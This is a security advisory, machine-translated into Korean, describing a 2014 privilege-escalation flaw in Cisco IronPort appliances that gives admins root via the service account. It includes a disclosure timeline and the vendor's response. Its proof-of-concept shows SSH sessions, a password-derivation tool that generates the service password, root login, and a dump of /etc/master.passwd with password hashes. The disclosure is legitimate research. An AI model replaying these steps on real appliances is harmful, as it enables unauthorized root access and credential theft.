cisco ironport appliances service
1.0.0
Linux로 업데이트되었습니다
Cisco Ironport Appliances 권한 에스컬레이션 취약성 공급 업체 : Cisco 제품 웹 페이지 : http://www.cisco.com 영향을받는 버전 : Cisco Ironport ESA -Asyncos 8.5.5-280 Cisco Ironport WSA -Asyncos 8.0.5-075 Cisco Ironport SMA -Asyncos 8.3.6-0 날짜 : 22/05/2014 크레딧 : Glafkos Charalambous CVE : Cisco에 의해 지정되지 않았습니다.
공개 타임 라인 : 19-05-2014 : 공급 업체 알림 20-05-2014 : 공급 업체 응답/피드백 27-08-2014 : 공급 업체 수정/패치 24-01-2015 : 공개 공개
설명 : Cisco Ironport 기기는 인증 된 "관리자"권한 에스컬레이션에 취약합니다. GUI 또는 CLI에서 서비스 계정을 활성화하면 관리자가 기기에서 루트 액세스를 얻을 수 있으므로 기존의 모든 "관리자"계정 제한을 우회 할 수 있습니다. 이 취약점은 Cisco가 기술 지원을 제공하기 위해 기기에 원격으로 액세스하기 위해 사용하는 암호 생성 프로세스의 알고리즘 구현이 약화 되었기 때문입니다.
공급 업체 응답 : 예상대로, 이는 취약성이 아니라 보안 경화 문제로 간주됩니다. 따라서 우리는 CVE를 할당하지 않았지만 이것이 SMA, ESA 및 WSA에 고정되어 있는지 확인했습니다. 이 수정 사항에는 이진의 알고리즘을 더 잘 보호하고 관리자가 패스 프레이즈를 설정하고 계정을 활성화 할 때보다 강력하고 암호 복잡성을 시행하는 것과 같은 몇 가지 변경 사항이 포함되었습니다.
[SD] 참고 : 지원 담당자를위한 액세스를 활성화하고 최종 비밀번호를 계산하는 데 사용되는 패스 프레이즈를 설정하려면 관리 자격 증명이 필요합니다. [GC] 여전히 관리자 사용자는 어플라이언스에 대한 권한이 제한되어 있으며 기본 비밀번호가 완전한 루트 액세스를 초래하더라도 자격 증명도 손상 될 수 있습니다.
[SD]이 문제는 Cisco Bug ID에 의해 ESA에 대해 추적됩니다. Cisco Bug ID : CSCUO96056 및 Cisco Bug ID CSCUO90528의 SMA 용 CSCUO96011.
기술적 인 세부 사항 : 기본 비밀번호 "Ironport"또는 사용자 지정된 사용자를 사용하여 어플라이언스에 로그인하면 고객 지원 원격 액세스를 가능하게하는 옵션이 있습니다. 이 옵션은 GUI의 도움말 및 지원 -> 원격 액세스 또는 CLI 콘솔 계정 "enablediag"를 사용하고 명령 서비스를 발행하여 찾을 수 있습니다. 이 서비스를 활성화하려면 어플라이언스에 원격으로 연결하고 인증하기 위해 Cisco TechSupport의 어플라이언스 일련 번호와 함께 제공되어야하는 임시 사용자 비밀번호가 필요합니다.
서비스 계정을 활성화하여 임시 비밀번호와 어플라이언스의 일련 번호가 있으면 공격자는 전체 루트 액세스를 얻을 수있을뿐만 아니라 잠재적으로 손상, 백도어 등을 얻을 수 있습니다.
POC :
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
